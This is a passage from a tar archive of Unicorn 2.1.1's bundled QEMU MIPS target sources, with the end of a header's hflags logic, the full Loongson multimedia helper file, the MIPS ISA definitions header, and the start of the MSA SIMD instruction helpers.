MIPS_HFLAG_AWRAP; } else if (env->insn_flags & ISA_MIPS64R6) { /* Address wrapping for Supervisor and Kernel is specified in R6 */ if ((((env->hflags & MIPS_HFLAG_KSU) == MIPS_HFLAG_SM) && !(env->CP0_Status & (1 << CP0St_SX))) || (((env->hflags & MIPS_HFLAG_KSU) == MIPS_HFLAG_KM) && !(env->CP0_Status & (1 << CP0St_KX)))) { env->hflags |= MIPS_HFLAG_AWRAP; } } #endif if (((env->CP0_Status & (1 << CP0St_CU0)) && !(env->insn_flags & ISA_MIPS32R6)) || !(env->hflags & MIPS_HFLAG_KSU)) { env->hflags |= MIPS_HFLAG_CP0; } if (env->CP0_Status & (1 << CP0St_CU1)) { env->hflags |= MIPS_HFLAG_FPU; } if (env->CP0_Status & (1 << CP0St_FR)) { env->hflags |= MIPS_HFLAG_F64; } if (((env->hflags & MIPS_HFLAG_KSU) != MIPS_HFLAG_KM) && (env->CP0_Config5 & (1 << CP0C5_SBRI))) { env->hflags |= MIPS_HFLAG_SBRI; } if (env->insn_flags & ASE_DSP_R3) { /* * Our cpu supports DSP R3 ASE, so enable * access to DSP R3 resources. */ if (env->CP0_Status & (1 << CP0St_MX)) { env->hflags |= MIPS_HFLAG_DSP | MIPS_HFLAG_DSP_R2 | MIPS_HFLAG_DSP_R3; } } else if (env->insn_flags & ASE_DSP_R2) { /* * Our cpu supports DSP R2 ASE, so enable * access to DSP R2 resources. */ if (env->CP0_Status & (1 << CP0St_MX)) { env->hflags |= MIPS_HFLAG_DSP | MIPS_HFLAG_DSP_R2; } } else if (env->insn_flags & ASE_DSP) { /* * Our cpu supports DSP ASE, so enable * access to DSP resources. */ if (env->CP0_Status & (1 << CP0St_MX)) { env->hflags |= MIPS_HFLAG_DSP; } } if (env->insn_flags & ISA_MIPS32R2) { if (env->active_fpu.fcr0 & (1 << FCR0_F64)) { env->hflags |= MIPS_HFLAG_COP1X; } } else if (env->insn_flags & ISA_MIPS32) { if (env->hflags & MIPS_HFLAG_64) { env->hflags |= MIPS_HFLAG_COP1X; } } else if (env->insn_flags & ISA_MIPS4) { /* * All supported MIPS IV CPUs use the XX (CU3) to enable * and disable the MIPS IV extensions to the MIPS III ISA. * Some other MIPS IV CPUs ignore the bit, so the check here * would be too restrictive for them. */ if (env->CP0_Status & (1U << CP0St_CU3)) { env->hflags |= MIPS_HFLAG_COP1X; } } if (env->insn_flags & ASE_MSA) { if (env->CP0_Config5 & (1 << CP0C5_MSAEn)) { env->hflags |= MIPS_HFLAG_MSA; } } if (env->active_fpu.fcr0 & (1 << FCR0_FREP)) { if (env->CP0_Config5 & (1 << CP0C5_FRE)) { env->hflags |= MIPS_HFLAG_FRE; } } if (env->CP0_Config3 & (1 << CP0C3_LPA)) { if (env->CP0_PageGrain & (1 << CP0PG_ELPA)) { env->hflags |= MIPS_HFLAG_ELPA; } } } void cpu_mips_tlb_flush(CPUMIPSState *env); void sync_c0_status(CPUMIPSState *env, CPUMIPSState *cpu, int tc); void cpu_mips_store_status(CPUMIPSState *env, target_ulong val); void cpu_mips_store_cause(CPUMIPSState *env, target_ulong val); void QEMU_NORETURN do_raise_exception_err(CPUMIPSState *env, uint32_t exception, int error_code, uintptr_t pc); static inline void QEMU_NORETURN do_raise_exception(CPUMIPSState *env, uint32_t exception, uintptr_t pc) { do_raise_exception_err(env, exception, 0, pc); } #endif ���������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/mips/lmi_helper.c���������������������������������������������������������0000664�0000000�0000000�00000034060�14675241067�0020700�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Loongson Multimedia Instruction emulation helpers for QEMU. * * Copyright (c) 2011 Richard Henderson <rth@twiddle.net> * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/helper-proto.h" /* * If the byte ordering doesn't matter, i.e. all columns are treated * identically, then this union can be used directly. If byte ordering * does matter, we generally ignore dumping to memory. */ typedef union { uint8_t ub[8]; int8_t sb[8]; uint16_t uh[4]; int16_t sh[4]; uint32_t uw[2]; int32_t sw[2]; uint64_t d; } LMIValue; /* Some byte ordering issues can be mitigated by XORing in the following. */ #ifdef HOST_WORDS_BIGENDIAN # define BYTE_ORDER_XOR(N) N #else # define BYTE_ORDER_XOR(N) 0 #endif #define SATSB(x) (x < -0x80 ? -0x80 : x > 0x7f ? 0x7f : x) #define SATUB(x) (x > 0xff ? 0xff : x) #define SATSH(x) (x < -0x8000 ? -0x8000 : x > 0x7fff ? 0x7fff : x) #define SATUH(x) (x > 0xffff ? 0xffff : x) #define SATSW(x) \ (x < -0x80000000ll ? -0x80000000ll : x > 0x7fffffff ? 0x7fffffff : x) #define SATUW(x) (x > 0xffffffffull ? 0xffffffffull : x) uint64_t helper_paddsb(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned int i; vs.d = fs; vt.d = ft; for (i = 0; i < 8; ++i) { int r = vs.sb[i] + vt.sb[i]; vs.sb[i] = SATSB(r); } return vs.d; } uint64_t helper_paddusb(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned int i; vs.d = fs; vt.d = ft; for (i = 0; i < 8; ++i) { int r = vs.ub[i] + vt.ub[i]; vs.ub[i] = SATUB(r); } return vs.d; } uint64_t helper_paddsh(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned int i; vs.d = fs; vt.d = ft; for (i = 0; i < 4; ++i) { int r = vs.sh[i] + vt.sh[i]; vs.sh[i] = SATSH(r); } return vs.d; } uint64_t helper_paddush(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned int i; vs.d = fs; vt.d = ft; for (i = 0; i < 4; ++i) { int r = vs.uh[i] + vt.uh[i]; vs.uh[i] = SATUH(r); } return vs.d; } uint64_t helper_paddb(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned int i; vs.d = fs; vt.d = ft; for (i = 0; i < 8; ++i) { vs.ub[i] += vt.ub[i]; } return vs.d; } uint64_t helper_paddh(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned int i; vs.d = fs; vt.d = ft; for (i = 0; i < 4; ++i) { vs.uh[i] += vt.uh[i]; } return vs.d; } uint64_t helper_paddw(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned int i; vs.d = fs; vt.d = ft; for (i = 0; i < 2; ++i) { vs.uw[i] += vt.uw[i]; } return vs.d; } uint64_t helper_psubsb(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned int i; vs.d = fs; vt.d = ft; for (i = 0; i < 8; ++i) { int r = vs.sb[i] - vt.sb[i]; vs.sb[i] = SATSB(r); } return vs.d; } uint64_t helper_psubusb(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned int i; vs.d = fs; vt.d = ft; for (i = 0; i < 8; ++i) { int r = vs.ub[i] - vt.ub[i]; vs.ub[i] = SATUB(r); } return vs.d; } uint64_t helper_psubsh(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned int i; vs.d = fs; vt.d = ft; for (i = 0; i < 4; ++i) { int r = vs.sh[i] - vt.sh[i]; vs.sh[i] = SATSH(r); } return vs.d; } uint64_t helper_psubush(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned int i; vs.d = fs; vt.d = ft; for (i = 0; i < 4; ++i) { int r = vs.uh[i] - vt.uh[i]; vs.uh[i] = SATUH(r); } return vs.d; } uint64_t helper_psubb(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned int i; vs.d = fs; vt.d = ft; for (i = 0; i < 8; ++i) { vs.ub[i] -= vt.ub[i]; } return vs.d; } uint64_t helper_psubh(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned int i; vs.d = fs; vt.d = ft; for (i = 0; i < 4; ++i) { vs.uh[i] -= vt.uh[i]; } return vs.d; } uint64_t helper_psubw(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned int i; vs.d = fs; vt.d = ft; for (i = 0; i < 2; ++i) { vs.uw[i] -= vt.uw[i]; } return vs.d; } uint64_t helper_pshufh(uint64_t fs, uint64_t ft) { unsigned host = BYTE_ORDER_XOR(3); LMIValue vd, vs; unsigned i; vs.d = fs; vd.d = 0; for (i = 0; i < 4; i++, ft >>= 2) { vd.uh[i ^ host] = vs.uh[(ft & 3) ^ host]; } return vd.d; } uint64_t helper_packsswh(uint64_t fs, uint64_t ft) { uint64_t fd = 0; int64_t tmp; tmp = (int32_t)(fs >> 0); tmp = SATSH(tmp); fd |= (tmp & 0xffff) << 0; tmp = (int32_t)(fs >> 32); tmp = SATSH(tmp); fd |= (tmp & 0xffff) << 16; tmp = (int32_t)(ft >> 0); tmp = SATSH(tmp); fd |= (tmp & 0xffff) << 32; tmp = (int32_t)(ft >> 32); tmp = SATSH(tmp); fd |= (tmp & 0xffff) << 48; return fd; } uint64_t helper_packsshb(uint64_t fs, uint64_t ft) { uint64_t fd = 0; unsigned int i; for (i = 0; i < 4; ++i) { int16_t tmp = fs >> (i * 16); tmp = SATSB(tmp); fd |= (uint64_t)(tmp & 0xff) << (i * 8); } for (i = 0; i < 4; ++i) { int16_t tmp = ft >> (i * 16); tmp = SATSB(tmp); fd |= (uint64_t)(tmp & 0xff) << (i * 8 + 32); } return fd; } uint64_t helper_packushb(uint64_t fs, uint64_t ft) { uint64_t fd = 0; unsigned int i; for (i = 0; i < 4; ++i) { int16_t tmp = fs >> (i * 16); tmp = SATUB(tmp); fd |= (uint64_t)(tmp & 0xff) << (i * 8); } for (i = 0; i < 4; ++i) { int16_t tmp = ft >> (i * 16); tmp = SATUB(tmp); fd |= (uint64_t)(tmp & 0xff) << (i * 8 + 32); } return fd; } uint64_t helper_punpcklwd(uint64_t fs, uint64_t ft) { return (fs & 0xffffffff) | (ft << 32); } uint64_t helper_punpckhwd(uint64_t fs, uint64_t ft) { return (fs >> 32) | (ft & ~0xffffffffull); } uint64_t helper_punpcklhw(uint64_t fs, uint64_t ft) { unsigned host = BYTE_ORDER_XOR(3); LMIValue vd, vs, vt; vs.d = fs; vt.d = ft; vd.uh[0 ^ host] = vs.uh[0 ^ host]; vd.uh[1 ^ host] = vt.uh[0 ^ host]; vd.uh[2 ^ host] = vs.uh[1 ^ host]; vd.uh[3 ^ host] = vt.uh[1 ^ host]; return vd.d; } uint64_t helper_punpckhhw(uint64_t fs, uint64_t ft) { unsigned host = BYTE_ORDER_XOR(3); LMIValue vd, vs, vt; vs.d = fs; vt.d = ft; vd.uh[0 ^ host] = vs.uh[2 ^ host]; vd.uh[1 ^ host] = vt.uh[2 ^ host]; vd.uh[2 ^ host] = vs.uh[3 ^ host]; vd.uh[3 ^ host] = vt.uh[3 ^ host]; return vd.d; } uint64_t helper_punpcklbh(uint64_t fs, uint64_t ft) { unsigned host = BYTE_ORDER_XOR(7); LMIValue vd, vs, vt; vs.d = fs; vt.d = ft; vd.ub[0 ^ host] = vs.ub[0 ^ host]; vd.ub[1 ^ host] = vt.ub[0 ^ host]; vd.ub[2 ^ host] = vs.ub[1 ^ host]; vd.ub[3 ^ host] = vt.ub[1 ^ host]; vd.ub[4 ^ host] = vs.ub[2 ^ host]; vd.ub[5 ^ host] = vt.ub[2 ^ host]; vd.ub[6 ^ host] = vs.ub[3 ^ host]; vd.ub[7 ^ host] = vt.ub[3 ^ host]; return vd.d; } uint64_t helper_punpckhbh(uint64_t fs, uint64_t ft) { unsigned host = BYTE_ORDER_XOR(7); LMIValue vd, vs, vt; vs.d = fs; vt.d = ft; vd.ub[0 ^ host] = vs.ub[4 ^ host]; vd.ub[1 ^ host] = vt.ub[4 ^ host]; vd.ub[2 ^ host] = vs.ub[5 ^ host]; vd.ub[3 ^ host] = vt.ub[5 ^ host]; vd.ub[4 ^ host] = vs.ub[6 ^ host]; vd.ub[5 ^ host] = vt.ub[6 ^ host]; vd.ub[6 ^ host] = vs.ub[7 ^ host]; vd.ub[7 ^ host] = vt.ub[7 ^ host]; return vd.d; } uint64_t helper_pavgh(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned i; vs.d = fs; vt.d = ft; for (i = 0; i < 4; i++) { vs.uh[i] = (vs.uh[i] + vt.uh[i] + 1) >> 1; } return vs.d; } uint64_t helper_pavgb(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned i; vs.d = fs; vt.d = ft; for (i = 0; i < 8; i++) { vs.ub[i] = (vs.ub[i] + vt.ub[i] + 1) >> 1; } return vs.d; } uint64_t helper_pmaxsh(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned i; vs.d = fs; vt.d = ft; for (i = 0; i < 4; i++) { vs.sh[i] = (vs.sh[i] >= vt.sh[i] ? vs.sh[i] : vt.sh[i]); } return vs.d; } uint64_t helper_pminsh(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned i; vs.d = fs; vt.d = ft; for (i = 0; i < 4; i++) { vs.sh[i] = (vs.sh[i] <= vt.sh[i] ? vs.sh[i] : vt.sh[i]); } return vs.d; } uint64_t helper_pmaxub(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned i; vs.d = fs; vt.d = ft; for (i = 0; i < 4; i++) { vs.ub[i] = (vs.ub[i] >= vt.ub[i] ? vs.ub[i] : vt.ub[i]); } return vs.d; } uint64_t helper_pminub(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned i; vs.d = fs; vt.d = ft; for (i = 0; i < 4; i++) { vs.ub[i] = (vs.ub[i] <= vt.ub[i] ? vs.ub[i] : vt.ub[i]); } return vs.d; } uint64_t helper_pcmpeqw(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned i; vs.d = fs; vt.d = ft; for (i = 0; i < 2; i++) { vs.uw[i] = -(vs.uw[i] == vt.uw[i]); } return vs.d; } uint64_t helper_pcmpgtw(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned i; vs.d = fs; vt.d = ft; for (i = 0; i < 2; i++) { vs.uw[i] = -(vs.uw[i] > vt.uw[i]); } return vs.d; } uint64_t helper_pcmpeqh(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned i; vs.d = fs; vt.d = ft; for (i = 0; i < 4; i++) { vs.uh[i] = -(vs.uh[i] == vt.uh[i]); } return vs.d; } uint64_t helper_pcmpgth(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned i; vs.d = fs; vt.d = ft; for (i = 0; i < 4; i++) { vs.uh[i] = -(vs.uh[i] > vt.uh[i]); } return vs.d; } uint64_t helper_pcmpeqb(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned i; vs.d = fs; vt.d = ft; for (i = 0; i < 8; i++) { vs.ub[i] = -(vs.ub[i] == vt.ub[i]); } return vs.d; } uint64_t helper_pcmpgtb(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned i; vs.d = fs; vt.d = ft; for (i = 0; i < 8; i++) { vs.ub[i] = -(vs.ub[i] > vt.ub[i]); } return vs.d; } uint64_t helper_psllw(uint64_t fs, uint64_t ft) { LMIValue vs; unsigned i; ft &= 0x7f; if (ft > 31) { return 0; } vs.d = fs; for (i = 0; i < 2; ++i) { vs.uw[i] <<= ft; } return vs.d; } uint64_t helper_psrlw(uint64_t fs, uint64_t ft) { LMIValue vs; unsigned i; ft &= 0x7f; if (ft > 31) { return 0; } vs.d = fs; for (i = 0; i < 2; ++i) { vs.uw[i] >>= ft; } return vs.d; } uint64_t helper_psraw(uint64_t fs, uint64_t ft) { LMIValue vs; unsigned i; ft &= 0x7f; if (ft > 31) { ft = 31; } vs.d = fs; for (i = 0; i < 2; ++i) { vs.sw[i] >>= ft; } return vs.d; } uint64_t helper_psllh(uint64_t fs, uint64_t ft) { LMIValue vs; unsigned i; ft &= 0x7f; if (ft > 15) { return 0; } vs.d = fs; for (i = 0; i < 4; ++i) { vs.uh[i] <<= ft; } return vs.d; } uint64_t helper_psrlh(uint64_t fs, uint64_t ft) { LMIValue vs; unsigned i; ft &= 0x7f; if (ft > 15) { return 0; } vs.d = fs; for (i = 0; i < 4; ++i) { vs.uh[i] >>= ft; } return vs.d; } uint64_t helper_psrah(uint64_t fs, uint64_t ft) { LMIValue vs; unsigned i; ft &= 0x7f; if (ft > 15) { ft = 15; } vs.d = fs; for (i = 0; i < 4; ++i) { vs.sh[i] >>= ft; } return vs.d; } uint64_t helper_pmullh(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned i; vs.d = fs; vt.d = ft; for (i = 0; i < 4; ++i) { vs.sh[i] *= vt.sh[i]; } return vs.d; } uint64_t helper_pmulhh(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned i; vs.d = fs; vt.d = ft; for (i = 0; i < 4; ++i) { int32_t r = vs.sh[i] * vt.sh[i]; vs.sh[i] = r >> 16; } return vs.d; } uint64_t helper_pmulhuh(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned i; vs.d = fs; vt.d = ft; for (i = 0; i < 4; ++i) { uint32_t r = vs.uh[i] * vt.uh[i]; vs.uh[i] = r >> 16; } return vs.d; } uint64_t helper_pmaddhw(uint64_t fs, uint64_t ft) { unsigned host = BYTE_ORDER_XOR(3); LMIValue vs, vt; uint32_t p0, p1; vs.d = fs; vt.d = ft; p0 = vs.sh[0 ^ host] * vt.sh[0 ^ host]; p0 += vs.sh[1 ^ host] * vt.sh[1 ^ host]; p1 = vs.sh[2 ^ host] * vt.sh[2 ^ host]; p1 += vs.sh[3 ^ host] * vt.sh[3 ^ host]; return ((uint64_t)p1 << 32) | p0; } uint64_t helper_pasubub(uint64_t fs, uint64_t ft) { LMIValue vs, vt; unsigned i; vs.d = fs; vt.d = ft; for (i = 0; i < 8; ++i) { int r = vs.ub[i] - vt.ub[i]; vs.ub[i] = (r < 0 ? -r : r); } return vs.d; } uint64_t helper_biadd(uint64_t fs) { unsigned i, fd; for (i = fd = 0; i < 8; ++i) { fd += (fs >> (i * 8)) & 0xff; } return fd & 0xffff; } uint64_t helper_pmovmskb(uint64_t fs) { unsigned fd = 0; fd |= ((fs >> 7) & 1) << 0; fd |= ((fs >> 15) & 1) << 1; fd |= ((fs >> 23) & 1) << 2; fd |= ((fs >> 31) & 1) << 3; fd |= ((fs >> 39) & 1) << 4; fd |= ((fs >> 47) & 1) << 5; fd |= ((fs >> 55) & 1) << 6; fd |= ((fs >> 63) & 1) << 7; return fd & 0xff; } ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/mips/mips-defs.h����������������������������������������������������������0000664�0000000�0000000�00000007046�14675241067�0020460�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef QEMU_MIPS_DEFS_H #define QEMU_MIPS_DEFS_H /* * If we want to use host float regs... * * #define USE_HOST_FLOAT_REGS */ /* Real pages are variable size... */ #define MIPS_TLB_MAX 128 /* * bit definitions for insn_flags (ISAs/ASEs flags) * ------------------------------------------------ */ /* * bits 0-31: MIPS base instruction sets */ #define ISA_MIPS1 0x0000000000000001ULL #define ISA_MIPS2 0x0000000000000002ULL #define ISA_MIPS3 0x0000000000000004ULL #define ISA_MIPS4 0x0000000000000008ULL #define ISA_MIPS5 0x0000000000000010ULL #define ISA_MIPS32 0x0000000000000020ULL #define ISA_MIPS32R2 0x0000000000000040ULL #define ISA_MIPS64 0x0000000000000080ULL #define ISA_MIPS64R2 0x0000000000000100ULL #define ISA_MIPS32R3 0x0000000000000200ULL #define ISA_MIPS64R3 0x0000000000000400ULL #define ISA_MIPS32R5 0x0000000000000800ULL #define ISA_MIPS64R5 0x0000000000001000ULL #define ISA_MIPS32R6 0x0000000000002000ULL #define ISA_MIPS64R6 0x0000000000004000ULL #define ISA_NANOMIPS32 0x0000000000008000ULL /* * bits 32-47: MIPS ASEs */ #define ASE_MIPS16 0x0000000100000000ULL #define ASE_MIPS3D 0x0000000200000000ULL #define ASE_MDMX 0x0000000400000000ULL #define ASE_DSP 0x0000000800000000ULL #define ASE_DSP_R2 0x0000001000000000ULL #define ASE_DSP_R3 0x0000002000000000ULL #define ASE_MT 0x0000004000000000ULL #define ASE_SMARTMIPS 0x0000008000000000ULL #define ASE_MICROMIPS 0x0000010000000000ULL #define ASE_MSA 0x0000020000000000ULL /* * bits 48-55: vendor-specific base instruction sets */ #define INSN_LOONGSON2E 0x0001000000000000ULL #define INSN_LOONGSON2F 0x0002000000000000ULL #define INSN_VR54XX 0x0004000000000000ULL #define INSN_R5900 0x0008000000000000ULL /* * bits 56-63: vendor-specific ASEs */ #define ASE_MMI 0x0100000000000000ULL #define ASE_MXU 0x0200000000000000ULL /* MIPS CPU defines. */ #define CPU_MIPS1 (ISA_MIPS1) #define CPU_MIPS2 (CPU_MIPS1 | ISA_MIPS2) #define CPU_MIPS3 (CPU_MIPS2 | ISA_MIPS3) #define CPU_MIPS4 (CPU_MIPS3 | ISA_MIPS4) #define CPU_VR54XX (CPU_MIPS4 | INSN_VR54XX) #define CPU_R5900 (CPU_MIPS3 | INSN_R5900) #define CPU_LOONGSON2E (CPU_MIPS3 | INSN_LOONGSON2E) #define CPU_LOONGSON2F (CPU_MIPS3 | INSN_LOONGSON2F) #define CPU_MIPS5 (CPU_MIPS4 | ISA_MIPS5) /* MIPS Technologies "Release 1" */ #define CPU_MIPS32 (CPU_MIPS2 | ISA_MIPS32) #define CPU_MIPS64 (CPU_MIPS5 | CPU_MIPS32 | ISA_MIPS64) /* MIPS Technologies "Release 2" */ #define CPU_MIPS32R2 (CPU_MIPS32 | ISA_MIPS32R2) #define CPU_MIPS64R2 (CPU_MIPS64 | CPU_MIPS32R2 | ISA_MIPS64R2) /* MIPS Technologies "Release 3" */ #define CPU_MIPS32R3 (CPU_MIPS32R2 | ISA_MIPS32R3) #define CPU_MIPS64R3 (CPU_MIPS64R2 | CPU_MIPS32R3 | ISA_MIPS64R3) /* MIPS Technologies "Release 5" */ #define CPU_MIPS32R5 (CPU_MIPS32R3 | ISA_MIPS32R5) #define CPU_MIPS64R5 (CPU_MIPS64R3 | CPU_MIPS32R5 | ISA_MIPS64R5) /* MIPS Technologies "Release 6" */ #define CPU_MIPS32R6 (CPU_MIPS32R5 | ISA_MIPS32R6) #define CPU_MIPS64R6 (CPU_MIPS64R5 | CPU_MIPS32R6 | ISA_MIPS64R6) /* Wave Computing: "nanoMIPS" */ #define CPU_NANOMIPS32 (CPU_MIPS32R6 | ISA_NANOMIPS32) /* * Strictly follow the architecture standard: * - Disallow "special" instruction handling for PMON/SPIM. * Note that we still maintain Count/Compare to match the host clock. * * #define MIPS_STRICT_STANDARD 1 */ #endif /* QEMU_MIPS_DEFS_H */ ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/mips/msa_helper.c���������������������������������������������������������0000664�0000000�0000000�00001047661�14675241067�0020713�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * MIPS SIMD Architecture Module Instruction emulation helpers for QEMU. * * Copyright (c) 2014 Imagination Technologies * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "internal.h" #include "exec/exec-all.h" #include "exec/helper-proto.h" #include "fpu/softfloat.h" /* Data format min and max values */ #define DF_BITS(df) (1ULL << ((df) + 3)) #define DF_MAX_INT(df) (int64_t)((1LL << (DF_BITS(df) - 1)) - 1) #define M_MAX_INT(m) (int64_t)((1LL << ((m) - 1)) - 1) #ifdef _MSC_VER #define DF_MIN_INT(df) (int64_t)(0 - (1LL << (DF_BITS(df) - 1))) #define M_MIN_INT(m) (int64_t)(0 - (1LL << ((m) - 1))) #define DF_MAX_UINT(df) (uint64_t)(0xffffffffffffffffULL >> (64 - DF_BITS(df))) #define M_MAX_UINT(m) (uint64_t)(0xffffffffffffffffULL >> (64 - (m))) #else #define DF_MIN_INT(df) (int64_t)(-(1LL << (DF_BITS(df) - 1))) #define M_MIN_INT(m) (int64_t)(-(1LL << ((m) - 1))) #define DF_MAX_UINT(df) (uint64_t)(-1ULL >> (64 - DF_BITS(df))) #define M_MAX_UINT(m) (uint64_t)(-1ULL >> (64 - (m))) #endif #define UNSIGNED(x, df) ((x) & DF_MAX_UINT(df)) #define SIGNED(x, df) \ ((((int64_t)x) << (64 - DF_BITS(df))) >> (64 - DF_BITS(df))) /* Element-by-element access macros */ #define DF_ELEMENTS(df) (MSA_WRLEN / DF_BITS(df)) /* * Bit Count * --------- * * +---------------+----------------------------------------------------------+ * | NLOC.B | Vector Leading Ones Count (byte) | * | NLOC.H | Vector Leading Ones Count (halfword) | * | NLOC.W | Vector Leading Ones Count (word) | * | NLOC.D | Vector Leading Ones Count (doubleword) | * | NLZC.B | Vector Leading Zeros Count (byte) | * | NLZC.H | Vector Leading Zeros Count (halfword) | * | NLZC.W | Vector Leading Zeros Count (word) | * | NLZC.D | Vector Leading Zeros Count (doubleword) | * | PCNT.B | Vector Population Count (byte) | * | PCNT.H | Vector Population Count (halfword) | * | PCNT.W | Vector Population Count (word) | * | PCNT.D | Vector Population Count (doubleword) | * +---------------+----------------------------------------------------------+ */ static inline int64_t msa_nlzc_df(uint32_t df, int64_t arg) { uint64_t x, y; int n, c; x = UNSIGNED(arg, df); n = DF_BITS(df); c = DF_BITS(df) / 2; do { y = x >> c; if (y != 0) { n = n - c; x = y; } c = c >> 1; } while (c != 0); return n - x; } static inline int64_t msa_nloc_df(uint32_t df, int64_t arg) { return msa_nlzc_df(df, UNSIGNED((~arg), df)); } void helper_msa_nloc_b(CPUMIPSState *env, uint32_t wd, uint32_t ws) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); pwd->b[0] = msa_nloc_df(DF_BYTE, pws->b[0]); pwd->b[1] = msa_nloc_df(DF_BYTE, pws->b[1]); pwd->b[2] = msa_nloc_df(DF_BYTE, pws->b[2]); pwd->b[3] = msa_nloc_df(DF_BYTE, pws->b[3]); pwd->b[4] = msa_nloc_df(DF_BYTE, pws->b[4]); pwd->b[5] = msa_nloc_df(DF_BYTE, pws->b[5]); pwd->b[6] = msa_nloc_df(DF_BYTE, pws->b[6]); pwd->b[7] = msa_nloc_df(DF_BYTE, pws->b[7]); pwd->b[8] = msa_nloc_df(DF_BYTE, pws->b[8]); pwd->b[9] = msa_nloc_df(DF_BYTE, pws->b[9]); pwd->b[10] = msa_nloc_df(DF_BYTE, pws->b[10]); pwd->b[11] = msa_nloc_df(DF_BYTE, pws->b[11]); pwd->b[12] = msa_nloc_df(DF_BYTE, pws->b[12]); pwd->b[13] = msa_nloc_df(DF_BYTE, pws->b[13]); pwd->b[14] = msa_nloc_df(DF_BYTE, pws->b[14]); pwd->b[15] = msa_nloc_df(DF_BYTE, pws->b[15]); } void helper_msa_nloc_h(CPUMIPSState *env, uint32_t wd, uint32_t ws) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); pwd->h[0] = msa_nloc_df(DF_HALF, pws->h[0]); pwd->h[1] = msa_nloc_df(DF_HALF, pws->h[1]); pwd->h[2] = msa_nloc_df(DF_HALF, pws->h[2]); pwd->h[3] = msa_nloc_df(DF_HALF, pws->h[3]); pwd->h[4] = msa_nloc_df(DF_HALF, pws->h[4]); pwd->h[5] = msa_nloc_df(DF_HALF, pws->h[5]); pwd->h[6] = msa_nloc_df(DF_HALF, pws->h[6]); pwd->h[7] = msa_nloc_df(DF_HALF, pws->h[7]); } void helper_msa_nloc_w(CPUMIPSState *env, uint32_t wd, uint32_t ws) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); pwd->w[0] = msa_nloc_df(DF_WORD, pws->w[0]); pwd->w[1] = msa_nloc_df(DF_WORD, pws->w[1]); pwd->w[2] = msa_nloc_df(DF_WORD, pws->w[2]); pwd->w[3] = msa_nloc_df(DF_WORD, pws->w[3]); } void helper_msa_nloc_d(CPUMIPSState *env, uint32_t wd, uint32_t ws) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); pwd->d[0] = msa_nloc_df(DF_DOUBLE, pws->d[0]); pwd->d[1] = msa_nloc_df(DF_DOUBLE, pws->d[1]); } void helper_msa_nlzc_b(CPUMIPSState *env, uint32_t wd, uint32_t ws) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); pwd->b[0] = msa_nlzc_df(DF_BYTE, pws->b[0]); pwd->b[1] = msa_nlzc_df(DF_BYTE, pws->b[1]); 